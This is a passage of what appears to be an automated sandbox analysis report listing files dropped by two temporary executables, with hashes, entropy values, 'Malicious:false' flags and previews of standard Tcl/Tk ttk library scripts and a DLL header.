                                                                                                                                                                                                                                                                                                                                Preview:#.# Ttk widget set: progress bar utilities..#..namespace eval ttk::progressbar {. variable Timers.;# Map: widget name -> after ID.}..# Autoincrement --.#.Periodic callback procedure for autoincrement mode.#.proc ttk::progressbar::Autoincrement {pb steptime stepsize} {. variable Timers.. if {![winfo exists $pb]} {. .# widget has been destroyed -- cancel timer..unset -nocomplain Timers($pb)..return. }.. set Timers($pb) [after $steptime \. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].. $pb step $stepsize.}..# ttk::progressbar::start --.#.Start autoincrement mode. Invoked by [$pb start] widget code..#.proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {. variable Timers. if {![info exists Timers($pb)]} {..Autoincrement $pb $steptime $stepsize. }.}..# ttk::progressbar::stop --.#.Cancel autoincrement mode. Invoked by [$pb stop] widget code..#.proc ttk::progressbar::stop {pb} {. variable Timers. if {[info exists Timers($pb
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2698
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7624002445430955
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:6Zsdayx/HZtYRqucO6wEKyRtZt0TcKVqZ4TFZkPDMiNf:Wde/5tYRquMwEKyFt0TcKVG4TrkLMwf
                                                                                                                                                                                                                                                                                                                                MD5:B41A9DF31924DEA36D69CB62891E8472
                                                                                                                                                                                                                                                                                                                                SHA1:4C2877FBB210FDBBDE52EA8B5617F68AD2DF7B93
                                                                                                                                                                                                                                                                                                                                SHA-256:25D0FE2B415292872EF7ACDB2DFA12D04C080B7F9B1C61F28C81AA2236180479
                                                                                                                                                                                                                                                                                                                                SHA-512:A50DB6DA3D40D07610629DE45F06A438C6F2846324C3891C54C99074CFB7BEED329F27918C8A85BADB22C6B64740A2053B891F8E5D129D9B0A1FF103E7137D83
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>.#.# Bindings for the TScale widget..namespace eval ttk::scale {. variable State. array set State {..dragging 0. }.}..bind TScale <ButtonPress-1> { ttk::scale::Press %W %x %y }.bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-2> { ttk::scale::Jump %W %x %y }.bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-3> { ttk::scale::Jump %W %x %y }.bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }..## Keyboard navigation bindings:.#.bind TScale <<LineStart>> { %W set [%W cget -from] }.bind TScale <<LineEnd>> { %W set [%W cget -to] }..bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 }.bind TScale <<PrevLine>> {
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3097
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.913511104649656
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:OsSofRsvfH3Noo2kvrjnWG3Lcyst0Rhrdy:plcHdoorDjWEFeuTy
                                                                                                                                                                                                                                                                                                                                MD5:93181DBE76EF9C39849A09242D6DF8C0
                                                                                                                                                                                                                                                                                                                                SHA1:DE3B47AFC3E5371BF1CD0541790A9B78A97570AB
                                                                                                                                                                                                                                                                                                                                SHA-256:5932043286A30A3CFFB2B6CE68CCDB9172A718F32926E25D3A962AE63CAD515C
                                                                                                                                                                                                                                                                                                                                SHA-512:5C85284E063A5DE17F6CE432B3EF899D046A78725BD1F930229576BED1116C03A3EE0611B988E9903F47DA8F694483E5A76464450C48EB14622F6784004B8F7E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Bindings for TScrollbar widget.#..# Still don't have a working ttk::scrollbar under OSX -.# Swap in a [tk::scrollbar] on that platform,.# unless user specifies -class or -style..#.if {[tk windowingsystem] eq "aqua"} {. rename ::ttk::scrollbar ::ttk::_scrollbar. proc ttk::scrollbar {w args} {..set constructor ::tk::scrollbar..foreach {option _} $args {.. if {$option eq "-class" || $option eq "-style"} {...set constructor ::ttk::_scrollbar...break.. }..}..return [$constructor $w {*}$args]. }.}..namespace eval ttk::scrollbar {. variable State. # State(xPress).--. # State(yPress).-- initial position of mouse at start of drag.. # State(first).-- value of -first at start of drag..}..bind TScrollbar <ButtonPress-1> .{ ttk::scrollbar::Press %W %x %y }.bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }.bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }..bind TScrollbar <ButtonPress-2> .{ ttk::scrollbar::Jump %W %x %y }.bind TScrollb
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2406
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.78080326075935
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:KqL4LUBItZ3EZEhHR4vuRbMMie8GMW/H7vZZNQdqrYfy2nL+ZZvBb:KDYBIjHHRmiM1qvbnNQdqriyQIvB
                                                                                                                                                                                                                                                                                                                                MD5:3C8916A58C6EE1D61836E500A54C9321
                                                                                                                                                                                                                                                                                                                                SHA1:54F3F709698FAD020A048668749CB5A09EDE35AB
                                                                                                                                                                                                                                                                                                                                SHA-256:717D2EDD71076EA059903C7144588F8BBD8B0AFE69A55CBF23953149D6694D33
                                                                                                                                                                                                                                                                                                                                SHA-512:2B71569A5A96CAC1B708E894A2466B1054C3FAE5405E10799B182012141634BD2A7E9E9F516658E1A6D6E9E776E397608B581501A6CFE2EB4EC54459E9ECB267
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Sizegrip widget bindings..#.# Dragging a sizegrip widget resizes the containing toplevel..#.# NOTE: the sizegrip widget must be in the lower right hand corner..#..switch -- [tk windowingsystem] {. x11 -. win32 {..option add *TSizegrip.cursor [ttk::cursor seresize] widgetDefault. }. aqua {. .# Aqua sizegrips use default Arrow cursor.. }.}..namespace eval ttk::sizegrip {. variable State. array set State {..pressed .0..pressX ..0..pressY ..0..width ..0..height ..0..widthInc.1..heightInc.1. resizeX 1. resizeY 1..toplevel .{}. }.}..bind TSizegrip <ButtonPress-1> ..{ ttk::sizegrip::Press.%W %X %Y }.bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }.bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }..proc ttk::sizegrip::Press {W X Y} {. variable State.. if {[$W instate disabled]} { return }.. set top [winfo toplevel $W].. # If the toplevel is not resizable then bail. foreach {State(resiz
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4255
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9576194953603006
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:17n+wMf6/ocy2nO6lz+Ni2QQ0Q3LqSFLfhrxJSS3hQb:ln+wMOxVlaNi2QQ0QbdFLfhrxJzhQb
                                                                                                                                                                                                                                                                                                                                MD5:86BCA3AB915C2774425B70420E499140
                                                                                                                                                                                                                                                                                                                                SHA1:FD4798D79EEBA9CFFABCB2548068591DB531A716
                                                                                                                                                                                                                                                                                                                                SHA-256:51F8A6C772648541684B48622FFE41B77871A185A8ACD11E9DEC9EC41D65D9CD
                                                                                                                                                                                                                                                                                                                                SHA-512:659FB7E1631ED898E3C11670A04B953EB05CECB42A3C5EFBDD1BD97A7F99061920FD5DB3915476F224BB2C72358623E1B474B0FC3FBB7FD3734487B87A388FD7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# ttk::spinbox bindings.#..namespace eval ttk::spinbox { }..### Spinbox bindings..#.# Duplicate the Entry bindings, override if needed:.#..ttk::copyBindings TEntry TSpinbox..bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }.bind TSpinbox <ButtonPress-1> ..{ ttk::spinbox::Press %W %x %y }.bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }.bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }.bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click..bind TSpinbox <KeyPress-Up>..{ event generate %W <<Increment>> }.bind TSpinbox <KeyPress-Down> ..{ event generate %W <<Decrement>> }..bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }.bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }..ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]..## Motion --.#.Sets cursor..#.proc ttk::spinbox::Motion {w x y} {. if { [$w identify $x $y] eq "textarea". && [$w instate {!readonly !disabled}]. } {..ttk::setCurso
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8898
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.860766938410698
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:2Ou002WQZ4sNNxjKomA3xj9L/37NbbF3r3G4eeMxCSbk3TPMrngEibSB1GjwPBKf:ZWeZ5BDFK+DsXibSQUMHLCGLdE2bZ
                                                                                                                                                                                                                                                                                                                                MD5:46B1D0EADBCF11AC51DD14B1A215AE04
                                                                                                                                                                                                                                                                                                                                SHA1:339026AE9533F4C331ADF8C71799B222DDD89D4F
                                                                                                                                                                                                                                                                                                                                SHA-256:DB6FAA8540C322F3E314968256D8AFFF39A1E4700EC17C7EFE364241F355D80F
                                                                                                                                                                                                                                                                                                                                SHA-512:0FC81426857949D5AC9FE7FF3C85A1270BD35BF6E6EAF3FE7AE0DE22A0C0E5CD96D6C9471216DC1DA673FAD949CA96A3751C3D3222474D2206AA9D8A455BA12E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# ttk::treeview widget bindings and utilities..#..namespace eval ttk::treeview {. variable State.. # Enter/Leave/Motion. #. set State(activeWidget) .{}. set State(activeHeading) .{}.. # Press/drag/release:. #. set State(pressMode) .none. set State(pressX)..0.. # For pressMode == "resize". set State(resizeColumn).#0.. # For pressmode == "heading". set State(heading) .{}.}..### Widget bindings..#..bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }.bind Treeview.<B1-Leave>..{ #nothing }.bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}.bind Treeview.<ButtonPress-1> .{ ttk::treeview::Press %W %x %y }.bind Treeview.<Double-ButtonPress-1> .{ ttk::treeview::DoubleClick %W %x %y }.bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }.bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }.bind Treeview .<KeyPress-Up> .{ ttk::treeview::Keynav %W up }.bind Treeview .<KeyPress-Down> .{ ttk::treeview::Keynav %
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4546
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.888987944406022
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:53a25129CKELfMonw+PzpaVnNqovaq2126262R2D2q2k2j+/2FhbtpGt0vcWOQRg:53j5MoKE7JEnN7CTMDDA6Tlj+uFhbttK
                                                                                                                                                                                                                                                                                                                                MD5:E38B399865C45E49419C01FF2ADDCE75
                                                                                                                                                                                                                                                                                                                                SHA1:F8A79CBC97A32622922D4A3A5694BCCB3F19DECB
                                                                                                                                                                                                                                                                                                                                SHA-256:61BAA0268770F127394A006340D99CE831A1C7AD773181C0C13122F7D2C5B7F6
                                                                                                                                                                                                                                                                                                                                SHA-512:285F520B648F5EC70DD79190C3B456F4D6DA2053210985F9E2C84139D8D51908296E4962B336894EE30536F09FAE84B912BC2ABF44A7011620F66CC5D9F71A8C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Ttk widget set initialization script..#..### Source library scripts..#..namespace eval ::ttk {. variable library. if {![info exists library]} {..set library [file dirname [info script]]. }.}..source [file join $::ttk::library fonts.tcl].source [file join $::ttk::library cursors.tcl].source [file join $::ttk::library utils.tcl]..## ttk::deprecated $old $new --.#.Define $old command as a deprecated alias for $new command.#.$old and $new must be fully namespace-qualified..#.proc ttk::deprecated {old new} {. interp alias {} $old {} ttk::do'deprecate $old $new.}.## do'deprecate --.#.Implementation procedure for deprecated commands --.#.issue a warning (once), then re-alias old to new..#.proc ttk::do'deprecate {old new args} {. deprecated'warning $old $new. interp alias {} $old {} $new. uplevel 1 [linsert $args 0 $new].}..## deprecated'warning --.#.Gripe about use of deprecated commands..#.proc ttk::deprecated'warning {old new} {. puts stderr "$old deprecated -- u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8562
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.958950985117383
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:MpEpXI4jqmW/y3gp9F+QE9PBRc+vWHJOfqW8j3ki3LDRdielRu+MXw+:6yXuwg1oPnc+epOEj31/s/5
                                                                                                                                                                                                                                                                                                                                MD5:65193FE52D77B8726B75FBF909EE860A
                                                                                                                                                                                                                                                                                                                                SHA1:991DEDD4666462DD9776FDF6C21F24D6CF794C85
                                                                                                                                                                                                                                                                                                                                SHA-256:C7CC9A15CFA999CF3763772729CC59F629E7E060AF67B7D783C50530B9B756E1
                                                                                                                                                                                                                                                                                                                                SHA-512:E43989F5F368D2E19C9A3521FB82C6C1DD9EEB91DF936A980FFC7674C8B236CB84E113908B8C9899B85430E8FC30315BDEC891071822D701C91C5978096341B7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Utilities for widget implementations..#..### Focus management..#.# See also: #1516479.#..## ttk::takefocus --.#.This is the default value of the "-takefocus" option.#.for ttk::* widgets that participate in keyboard navigation..#.# NOTES:.#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable].#.if -takefocus is 1, empty, or missing; but not if it's a.#.script prefix, so we have to check that here as well..#.#.proc ttk::takefocus {w} {. expr {[$w instate !disabled] && [winfo viewable $w]}.}..## ttk::GuessTakeFocus --.#.This routine is called as a fallback for widgets.#.with a missing or empty -takefocus option..#.#.It implements the same heuristics as tk::FocusOK..#.proc ttk::GuessTakeFocus {w} {. # Don't traverse to widgets with '-state disabled':. #. if {![catch {$w cget -state} state] && $state eq "disabled"} {..return 0. }.. # Allow traversal to widgets with explicit key or focus bindings:. #. if {[regexp {Key|Focus} [concat [bind $w] [bind [winfo c
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9670
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6132627565634055
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:kSsdZ6XzgE2kiSCyNPNVVSCIA5l/r5l/rW+i/CE38S7r/2JeJnpna+yfdyMq53Id:QZ6XzD2kFVeArPKJ3z7cQ0383cdd
                                                                                                                                                                                                                                                                                                                                MD5:ED071B9CEA98B7594A7E74593211BD38
                                                                                                                                                                                                                                                                                                                                SHA1:90998A1A51BCBAA3B4D72B08F5CBF19E330148D2
                                                                                                                                                                                                                                                                                                                                SHA-256:98180630FC1E8D7D7C1B20A5FF3352C8BD8CF259DD4EB3B829B8BD4CB8AE76A4
                                                                                                                                                                                                                                                                                                                                SHA-512:60C1EA45481AF5CFA3C5E579514DD3F4AC6C8D168553F374D0A3B3E1342E76CB71FA825C306233E185BED057E2B99877BAF9A5E88EBD48CF6DE171A8E7F6A230
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Settings for Microsoft Windows Vista and Server 2008.#..# The Vista theme can only be defined on Windows Vista and above. The theme.# is created in C due to the need to assign a theme-enabled function for .# detecting when themeing is disabled. On systems that cannot support the.# Vista theme, there will be no such theme created and we must not.# evaluate this script...if {"vista" ni [ttk::style theme names]} {. return.}..namespace eval ttk::theme::vista {.. ttk::style theme settings vista {.. .ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -insertcolor SystemWindowText \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -pa
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2867
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.876730704118724
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:679ahSh6FPGh0Ds0IXF6yjAfSAfqFRaBgLtei42kt+5Ql/n+iOaVhttZLgtKZLtO:6UJM0uTk5tm4RX0
                                                                                                                                                                                                                                                                                                                                MD5:0AE8205DFBA3C9B8EEAD01AC11C965D6
                                                                                                                                                                                                                                                                                                                                SHA1:61E8D2E909CF46886F6EA8571D4234DD336FEFB3
                                                                                                                                                                                                                                                                                                                                SHA-256:93E4011CAA9F01802D6DD5E02C3104E619084799E949974DFEE5E0C94D1E3952
                                                                                                                                                                                                                                                                                                                                SHA-512:E4448B922CA0FB425F879988537B9DB8F8C8A5A773805607574499506FDD9DEEB9CD41660E497002F78727AFBE3BEC17D9674E99CEF4A9D66FFD9C4536AFE153
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Settings for 'winnative' theme..#..namespace eval ttk::theme::winnative {. ttk::style theme settings winnative {...ttk::style configure "." \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -fieldbackground SystemWindow \.. -insertcolor SystemWindowText \.. -troughcolor SystemScrollbar \.. -font TkDefaultFont \.. ;...ttk::style map "." -foreground [list disabled SystemGrayText] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -relief raised -shiftrelief 1..ttk::style configure TCheckbutton -padding "2 4"..ttk::style configure TRadiobutton -padding "2 4"..ttk::style configure TMenubutton \.. -padding "8 4" -arrowsize 3 -relief raised...ttk::style map TButton -relief {{!disabled pressed} sunken}...ttk::style configure TEntry \.. -padding 2 -selectborderwidth 0 -insertwidth 1..t
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2375
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.931678702435916
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:NaxYun9ahShCd/T5QNt+7aVzEmAf8Afb9AfMMB+iOaVhttZLgtKZLti:k41eTXM
                                                                                                                                                                                                                                                                                                                                MD5:BD892A940333C1B804DF5C4594B0A5E6
                                                                                                                                                                                                                                                                                                                                SHA1:4E187F09F45898749CFE7860EDEF0D5EB83D764E
                                                                                                                                                                                                                                                                                                                                SHA-256:196C6FEF40FB6296D7762F30058AA73273083906F72F490E69FC77F1D5589B88
                                                                                                                                                                                                                                                                                                                                SHA-512:8273A8F789D695601A7BC74DFA2A6BD7FE280EC528869F502A578E90B6DD1613C4BCC5B6CD0D93A5CA0E6538BE740CD370F634DA84064213E1F50B919EBF35B8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Settings for 'xpnative' theme.#..namespace eval ttk::theme::xpnative {.. ttk::style theme settings xpnative {...ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -insertcolor SystemWindowText \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -padding 2..ttk::style configure TMenubutton -padding {8 4}...ttk::style configure TNotebook -tabmargins {2 2 2 0}..ttk::style map TNotebook.Tab \.. -expand [list selected {2 2 2 2}]...# Treeview:..ttk::style configure Heading -font TkHeadingFont..ttk::style configure Treeview -background SystemWindow..ttk::style map Treeview \.. -background [list selected SystemHighlight] \.. -fore
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10252
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.02143730499245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:1kMv11IDCB7PFPHGosvS6UMn8O9MGM/OTMjcrrwrt:xuMYMj+sZ
                                                                                                                                                                                                                                                                                                                                MD5:C832FDF24CA1F5C5E9B33FA5ECD11CAC
                                                                                                                                                                                                                                                                                                                                SHA1:8082FDE50C428D2511B05F529FCCF02651D5AC93
                                                                                                                                                                                                                                                                                                                                SHA-256:E34D828E740F151B96022934AAEC7BB8343E23D040FB54C04641888F51767EB8
                                                                                                                                                                                                                                                                                                                                SHA-512:58BEB05778271D4C91527B1CB23491962789D95ACCBC6C28E25D05BD3D6172AAC9A90E7741CD606C69FB8CECC29EE515DA7C7D4E6098BF67F08F18DFB7983323
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# unsupported.tcl --.#.# Commands provided by Tk without official support. Use them at your.# own risk. They may change or go away without notice..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# ----------------------------------------------------------------------.# Unsupported compatibility interface for folks accessing Tk's private.# commands and variable against recommended usage..# ----------------------------------------------------------------------..namespace eval ::tk::unsupported {.. # Map from the old global names of Tk private commands to their. # new namespace-encapsulated names... variable PrivateCommands. array set PrivateCommands {..tkButtonAutoInvoke..::tk::ButtonAutoInvoke..tkButtonDown...::tk::ButtonDown..tkButtonEnter...::tk::ButtonEnter..tkButtonInvoke...::tk::ButtonInvoke..tkButtonLeave...::tk::ButtonLeave..tkButtonUp...::tk::ButtonUp..tkCancelRepeat...::tk::Cance
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):26075
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9212533677507535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:obPA7Xi6V2+Bec3ipnFH6HZ1KDZvRcbQ3sd1GkjDo413lK/RIV5MXrSomsjiETwM:orA3TVJc3sd1GkF3cIVf591w
                                                                                                                                                                                                                                                                                                                                MD5:F863B7C5680017EE9F744900CC6C3834
                                                                                                                                                                                                                                                                                                                                SHA1:155E6E8752F6D48EF8D32CE2228E17EE58C2768E
                                                                                                                                                                                                                                                                                                                                SHA-256:9C78A976BBC933863FB0E4C23EE62B26F8EB3D7F101D7D32E6768579499E43B1
                                                                                                                                                                                                                                                                                                                                SHA-512:34F5B51EA1A2EFCD53B51A74E7E9B69FB154E017527BBD1CB3961F1619E74BE9D49D0583D193DBA7E8A3904F6C7446F278BC7977011DCCDAEBBE42D71FA5630C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# xmfbox.tcl --.#.#.Implements the "Motif" style file selection dialog for the.#.Unix platform. This implementation is used only if the.#."::tk_strictMotif" flag is set..#.# Copyright (c) 1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Scriptics Corporation.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}...# ::tk::MotifFDialog --.#.#.Implements a file dialog similar to the standard Motif file.#.selection box..#.# Arguments:.#.type.."open" or "save".#.args..Options parsed by the procedure..#.# Results:.#.When -multiple is set to 0, this returns the absolute pathname.#.of the selected file. (NOTE: This is not the same as a single.#.element list.).#.#.When -multiple is set to > 0, this returns a Tcl list of absolute.# pathnames. The argument for -multiple is ignored, but for consistency.# with Windows it defines the max
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1073680
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.327852618149687
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:ge+YbeoEYa6l0SYxytHcQJJwEI+V/IFx7agsSJNzkRoEVnOPmrZ6bK:ge+BN6axoc1r+VUx7agnNctOo6K
                                                                                                                                                                                                                                                                                                                                MD5:4D3D8E16E98558FF9DAC8FC7061E2759
                                                                                                                                                                                                                                                                                                                                SHA1:C918AB67B580F955B6361F9900930DA38CEC7C91
                                                                                                                                                                                                                                                                                                                                SHA-256:016D962782BEAE0EA8417A17E67956B27610F4565CFF71DD35A6E52AB187C095
                                                                                                                                                                                                                                                                                                                                SHA-512:0DFABFAD969DA806BC9C6C664CDF31647D89951832FF7E4E5EEED81F1DE9263ED71BDDEFF76EBB8E47D6248AD4F832CB8AD456F11E401C3481674BD60283991A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........VQx..Qx..Qx..X.O.Wx..j&..Sx..j&..Sx..j&..Zx..j&..[x...&..Rx......Sx..Qx...x...&..Px...&..Px...&#.Px...&..Px..RichQx..........................PE..d...w.:_.........." .....@..........h5....................................................`..........................................b..X...Hc.......p.......P..X....H..............`u..T............................u...............P..8............................text...Q?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata..X....P......................@..@.gfids.......`.......8..............@..@.rsrc........p.......:..............@..@.reloc...............F..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\FC24.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):704000
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.498036046725285
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:kRObekMSkfohrPUs37uzHnA6zg5cI5MpAHERDjrNyTeR0oUGOHtraxDExyc:WObekrkfohrP337uzHnA6cH+iHEOWUGq
                                                                                                                                                                                                                                                                                                                                MD5:DC768C91E97B42F218028EFA028C41CC
                                                                                                                                                                                                                                                                                                                                SHA1:63E5B917E7EB1FE94707CDE664875B71B247EEB5
                                                                                                                                                                                                                                                                                                                                SHA-256:A0991507C9DA2C3E21DDA334920FC6C36A7FA1595D4C865C6C200C05128F2EFE
